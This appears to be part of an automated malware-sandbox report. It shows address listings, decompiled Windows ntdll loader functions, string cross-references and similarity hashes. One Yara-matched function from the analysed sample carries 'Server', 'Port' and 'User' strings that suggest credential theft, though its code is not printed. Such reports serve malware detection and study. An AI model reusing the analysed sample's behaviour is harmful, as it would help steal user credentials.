                                                    0x01223eb1
                                                    0x01223eb4
                                                    0x01223eb7
                                                    0x01223ebc
                                                    0x012782a9
                                                    0x012782ab
                                                    0x01223ec2
                                                    0x01223ed3
                                                    0x01223ed5
                                                    0x01223ed8
                                                    0x01223ed8
                                                    0x01223edd
                                                    0x012782b3
                                                    0x012782b6
                                                    0x00000000
                                                    0x01223ee3
                                                    0x01223ee8
                                                    0x01223eed
                                                    0x01223ef0
                                                    0x01223ef3
                                                    0x01223f02
                                                    0x01223f05
                                                    0x01223f08
                                                    0x012782c0
                                                    0x012782c3
                                                    0x012782c5
                                                    0x012782c8
                                                    0x012782d0
                                                    0x012782e4
                                                    0x012782e6
                                                    0x012782e6
                                                    0x012782ed
                                                    0x012782f4
                                                    0x012782f7
                                                    0x012782f8
                                                    0x012782fc
                                                    0x012782ff
                                                    0x012782ff
                                                    0x01223f0e
                                                    0x01223f11
                                                    0x01223f16
                                                    0x01223f1d
                                                    0x01223f31
                                                    0x01278307
                                                    0x01278307
                                                    0x01223f31
                                                    0x01223f39
                                                    0x01223f48
                                                    0x01223f4d
                                                    0x01223f50
                                                    0x01223f50
                                                    0x01223f53
                                                    0x01223f58
                                                    0x01223f65
                                                    0x01223f65
                                                    0x01223f6a
                                                    0x00000000
                                                    0x01223f6a
                                                    0x01223edd
                                                    0x01223dda
                                                    0x01223ddd
                                                    0x01223de0
                                                    0x01223de5
                                                    0x01278245
                                                    0x01223deb
                                                    0x01223df7
                                                    0x01223dfc
                                                    0x01223dfe
                                                    0x01223e01
                                                    0x01223e01
                                                    0x01223e06
                                                    0x0127824d
                                                    0x0127824f
                                                    0x01278254
                                                    0x00000000
                                                    0x01223e0c
                                                    0x01223e11
                                                    0x01223e16
                                                    0x01223e19
                                                    0x01223e29
                                                    0x01223e2c
                                                    0x01223e2f
                                                    0x0127825c
                                                    0x0127825f
                                                    0x01278261
                                                    0x01278264
                                                    0x0127826c
                                                    0x01278280
                                                    0x01278282
                                                    0x01278282
                                                    0x01278289
                                                    0x01278290
                                                    0x01278293
                                                    0x01278294
                                                    0x01278298
                                                    0x0127829b
                                                    0x0127829b
                                                    0x01223e35
                                                    0x01223e38
                                                    0x01223e3d
                                                    0x01223e44
                                                    0x01223e58
                                                    0x012782a3
                                                    0x012782a3
                                                    0x01223e58
                                                    0x01223e60
                                                    0x01223e6f
                                                    0x01223e74
                                                    0x01223e77
                                                    0x01223e77
                                                    0x01223e7a
                                                    0x01223e7f
                                                    0x01223e8c
                                                    0x01223e8c
                                                    0x01223e91
                                                    0x00000000
                                                    0x01223e91

                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 01223D8C
                                                    • Kernel-MUI-Language-Allowed, xrefs: 01223DC0
                                                    • WindowsExcludedProcs, xrefs: 01223D6F
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01223E97
                                                    • Kernel-MUI-Language-SKU, xrefs: 01223F70
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 8ea48303ba9f3bbd0ca2a839203adf7bf57eae82f65ee623060a3221e652bbcb
                                                    • Instruction ID: 9c0d4aa600d4555a162c3ad61a6d95273422493d91aaa5999785a4ee63d28e93
                                                    • Opcode Fuzzy Hash: 8ea48303ba9f3bbd0ca2a839203adf7bf57eae82f65ee623060a3221e652bbcb
                                                    • Instruction Fuzzy Hash: ADF15172D20669EFCB15DF98C980EEFBBB9FF58650F14005AEA05A7210E7749E40CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004162A8, Relevance: 5.2, Strings: 4, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: :$Port:User :$Server:$User :
                                                    • API String ID: 0-1282517814
                                                    • Opcode ID: c8970c2b931018887aea4bdedfab37344f27ede935452f40dde5ecc3d18fd650
                                                    • Instruction ID: 23114adf15d665deae1ba4298d1833ec6eb969c54f6304a077b90c367e7aecc5
                                                    • Opcode Fuzzy Hash: c8970c2b931018887aea4bdedfab37344f27ede935452f40dde5ecc3d18fd650
                                                    • Instruction Fuzzy Hash: FD5168B2C01208AACF11DFA5DC819DFB7BCAF18314F14859EF54967101EA35EA94CBE9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01248E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E01248E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x130d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1308464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1305780 & 0x00000003) != 0) {
							E01295510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1305780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0125B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1307984; // 0xce2b40
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1308464; // 0x73b80110
					 *0x130b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01249B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1305780 & 0x00000005) != 0) {
						_push(_t49);
						E01295510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                    0x01248e0f
                                                    0x01248e16
                                                    0x01248e19
                                                    0x01248e1b
                                                    0x01248e21
                                                    0x01248e7f
                                                    0x01248e85
                                                    0x01289354
                                                    0x0128936c
                                                    0x01289371
                                                    0x0128937b
                                                    0x01289381
                                                    0x01289381
                                                    0x0128937b
                                                    0x01248e9d
                                                    0x01248e9d
                                                    0x01248e29
                                                    0x01248e2c
                                                    0x01248e38
                                                    0x01248e3e
                                                    0x01248e43
                                                    0x01248eb5
                                                    0x01248eb9
                                                    0x012892aa
                                                    0x012892af
                                                    0x012892e8
                                                    0x012892e8
                                                    0x012892af
                                                    0x01248eb9
                                                    0x01248e45
                                                    0x01248e53
                                                    0x01248e5b
                                                    0x01248e5f
                                                    0x01248e78
                                                    0x01248e78
                                                    0x01248e7d
                                                    0x01248ec3
                                                    0x01248ecd
                                                    0x01248ed2
                                                    0x01248ed2
                                                    0x01248ec5
                                                    0x01248ec5
                                                    0x00000000
                                                    0x01248e7d
                                                    0x01248e67
                                                    0x01248ea4
                                                    0x0128931a
                                                    0x00000000
                                                    0x00000000
                                                    0x01289320
                                                    0x01248ea4
                                                    0x01248e70
                                                    0x01289325
                                                    0x01289340
                                                    0x01289345
                                                    0x01289345
                                                    0x01248e76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0128932A
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01289357
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0128933B, 01289367
                                                    • LdrpFindDllActivationContext, xrefs: 01289331, 0128935D
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 471724fcba0c44cead6241676649a6617b03c61546e2e18ae9a004970337e8c4
                                                    • Instruction ID: 7002dd188a9a48547dafd5576485a9308691123bc8c53505bada12d0c261a88d
                                                    • Opcode Fuzzy Hash: 471724fcba0c44cead6241676649a6617b03c61546e2e18ae9a004970337e8c4
                                                    • Instruction Fuzzy Hash: 7F410931B703179FEF3FAB9C8859B36B6A5AB44B54F06416EFB0457192E7B09C808781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01228794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E01228794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0122934A() != 0) {
								_t159 = E0129A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1305780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01295510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1305780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0122849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01228999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01228999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1305c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1305c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01232280(_t92, 0x13086cc);
															_t94 = E012E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1305c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01228A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1305c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1305c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0125F380(_t136, 0x11f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01232280(_t108, 0x13086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E012E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0122FFB0(_t118, _t156, 0x13086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01259A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                    0x01228799
                                                    0x0122879d
                                                    0x012287a1
                                                    0x012287a3
                                                    0x012287a8
                                                    0x012287c3
                                                    0x012287c3
                                                    0x012287c8
                                                    0x012287d1
                                                    0x012287d4
                                                    0x012287d8
                                                    0x012287e5
                                                    0x012287ec
                                                    0x01279bfe
                                                    0x01279c00
                                                    0x01279c02
                                                    0x01279c08
                                                    0x01279c0d
                                                    0x01279c0f
                                                    0x01279c14
                                                    0x01279c2d
                                                    0x01279c32
                                                    0x01279c37
                                                    0x01279c3a
                                                    0x01279c3c
                                                    0x01279c42
                                                    0x01279c42
                                                    0x01279c3c
                                                    0x01279c02
                                                    0x012287da
                                                    0x012287df
                                                    0x012287e3
                                                    0x00000000
                                                    0x00000000
                                                    0x012287e3
                                                    0x012287f2
                                                    0x00000000
                                                    0x012287fb
                                                    0x012287fd
                                                    0x012287fe
                                                    0x0122880e
                                                    0x0122880f
                                                    0x01228810
                                                    0x01228814
                                                    0x0122881a
                                                    0x0122881c
                                                    0x0122881f
                                                    0x01228821
                                                    0x01228822
                                                    0x01228824
                                                    0x01228826
                                                    0x0122882c
                                                    0x0122882e
                                                    0x01279c48
                                                    0x01279c48
                                                    0x01228834
                                                    0x01228834
                                                    0x01228837
                                                    0x00000000
                                                    0x00000000
                                                    0x01228837
                                                    0x0122882e
                                                    0x0122883d
                                                    0x01228840
                                                    0x01228843
                                                    0x01228846
                                                    0x01228849
                                                    0x0122884c
                                                    0x0122884e
                                                    0x01228850
                                                    0x01228852
                                                    0x01228854
                                                    0x01228857
                                                    0x012288b4
                                                    0x012288b6
                                                    0x012288b6
                                                    0x01228859
                                                    0x01228859
                                                    0x01228859
                                                    0x01228861
                                                    0x01228866
                                                    0x0122886a
                                                    0x0122893d
                                                    0x01228941
                                                    0x00000000
                                                    0x01228947
                                                    0x01228947
                                                    0x0122894a
                                                    0x0122894c
                                                    0x00000000
                                                    0x01228952
                                                    0x01228955
                                                    0x0122895a
                                                    0x0122895d
                                                    0x0122895d
                                                    0x0122895f
                                                    0x01228961
                                                    0x01228961
                                                    0x01228968
                                                    0x00000000
                                                    0x00000000
                                                    0x0122896a
                                                    0x0122896b
                                                    0x0122896e
                                                    0x00000000
                                                    0x01228970
                                                    0x01228970
                                                    0x01228970
                                                    0x01228970
                                                    0x01228972
                                                    0x01228972
                                                    0x01228974
                                                    0x00000000
                                                    0x0122897a
                                                    0x0122897a
                                                    0x0122897d
                                                    0x00000000
                                                    0x01228983
                                                    0x01279c65
                                                    0x01279c6d
                                                    0x01279c72
                                                    0x01279c75
                                                    0x01279c75
                                                    0x01279c82
                                                    0x01279c86
                                                    0x01279c87
                                                    0x01279c88
                                                    0x01279c89
                                                    0x01279c8c
                                                    0x01279c90
                                                    0x01279c95
                                                    0x01279c97
                                                    0x01279ca0
                                                    0x01279ca3
                                                    0x01279ca9
                                                    0x01279ca9
                                                    0x00000000
                                                    0x01279ca9
                                                    0x01279ca3
                                                    0x00000000
                                                    0x01279c97
                                                    0x0122897d
                                                    0x00000000
                                                    0x01228974
                                                    0x01228988
                                                    0x01228992
                                                    0x01228996
                                                    0x00000000
                                                    0x01228996
                                                    0x0122894c
                                                    0x00000000
                                                    0x01228870
                                                    0x0122887b
                                                    0x0122887d
                                                    0x0122887f
                                                    0x01228881
                                                    0x01228884
                                                    0x01228884
                                                    0x01228886
                                                    0x01228889
                                                    0x0122888c
                                                    0x0122888e
                                                    0x01228891
                                                    0x01228891
                                                    0x01228898
                                                    0x00000000
                                                    0x00000000
                                                    0x0122889a
                                                    0x0122889b
                                                    0x0122889e
                                                    0x00000000
                                                    0x00000000
                                                    0x012288a0
                                                    0x012288a8
                                                    0x012288b0
                                                    0x012288b2
                                                    0x012288d3
                                                    0x012288d5
                                                    0x00000000
                                                    0x012288d7
                                                    0x012288db
                                                    0x012288dc
                                                    0x012288e0
                                                    0x012288e8
                                                    0x012288ee
                                                    0x012288f0
                                                    0x012288f3
                                                    0x012288fc
                                                    0x01228901
                                                    0x01228906
                                                    0x0122890c
                                                    0x0122890c
                                                    0x0122890f
                                                    0x01228916
                                                    0x01228917
                                                    0x01228918
                                                    0x01228919
                                                    0x0122891a
                                                    0x0122891f
                                                    0x01228921
                                                    0x01279c52
                                                    0x01279c55
                                                    0x01279c5b
                                                    0x01279cac
                                                    0x01279cc0
                                                    0x01279cc0
                                                    0x01279c55
                                                    0x01228927
                                                    0x01228927
                                                    0x0122892f
                                                    0x01228933
                                                    0x00000000
                                                    0x012288f5
                                                    0x012288f5
                                                    0x00000000
                                                    0x012288f7
                                                    0x012288f7
                                                    0x012288fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012288fa
                                                    0x012288f5
                                                    0x012288f3
                                                    0x00000000
                                                    0x012288d5
                                                    0x00000000
                                                    0x012288b2
                                                    0x012288c9
                                                    0x00000000
                                                    0x012288c9
                                                    0x0122887f
                                                    0x0122886a
                                                    0x01228857
                                                    0x01228852
                                                    0x012288bf
                                                    0x012288bf
                                                    0x012287aa
                                                    0x012287ad
                                                    0x012287ae
                                                    0x012287b4
                                                    0x012287b5
                                                    0x012287b6
                                                    0x012287b8
                                                    0x012287bd
                                                    0x012287c1
                                                    0x012287f4
                                                    0x012287fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012287c1
                                                    0x00000000

                                                    Strings
                                                    • LdrpDoPostSnapWork, xrefs: 01279C1E
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01279C28
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01279C18
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 2994545307-1948996284
                                                    • Opcode ID: 5019018bd88588c333a526f415585ed302cebe666dab54632f43f9363ffcd9ef
                                                    • Instruction ID: 12ffbf7771051f2f076e6b89775bb66a8bb04b04ac57186ac010ad0a9906cc68
                                                    • Opcode Fuzzy Hash: 5019018bd88588c333a526f415585ed302cebe666dab54632f43f9363ffcd9ef
                                                    • Instruction Fuzzy Hash: 0E910331A2022BEFEF19DF59D881ABE77F5FF54314B044069EA05AB241EB70E941CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01227E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E01227E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0122CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0121C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1305780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01295510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1305780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01237D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01237D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01297016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01237D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01237D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01297016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0124A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0121B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                    0x01227e4c
                                                    0x01227e50
                                                    0x01227e55
                                                    0x01227e58
                                                    0x01227e5d
                                                    0x01227e71
                                                    0x01227f33
                                                    0x01227e77
                                                    0x01227e77
                                                    0x01227e79
                                                    0x01227e79
                                                    0x01227e7e
                                                    0x01227f45
                                                    0x01279848
                                                    0x00000000
                                                    0x01279848
                                                    0x01227f4e
                                                    0x01227f53
                                                    0x01227f5a
                                                    0x00000000
                                                    0x00000000
                                                    0x0127985a
                                                    0x01279862
                                                    0x01279866
                                                    0x00000000
                                                    0x0127986c
                                                    0x00000000
                                                    0x0127986c
                                                    0x01227e84
                                                    0x01227e84
                                                    0x01227e8d
                                                    0x01279871
                                                    0x01227eb8
                                                    0x01227ec0
                                                    0x01227ec0
                                                    0x01227e9a
                                                    0x0127987e
                                                    0x00000000
                                                    0x00000000
                                                    0x01279884
                                                    0x0127988b
                                                    0x012798a7
                                                    0x012798ac
                                                    0x012798b1
                                                    0x012798b6
                                                    0x012798b8
                                                    0x012798b8
                                                    0x012798b9
                                                    0x00000000
                                                    0x012798b9
                                                    0x01227ea0
                                                    0x01227ea7
                                                    0x00000000
                                                    0x00000000
                                                    0x01227eac
                                                    0x01227eb1
                                                    0x01227ec6
                                                    0x01227ed0
                                                    0x012798cc
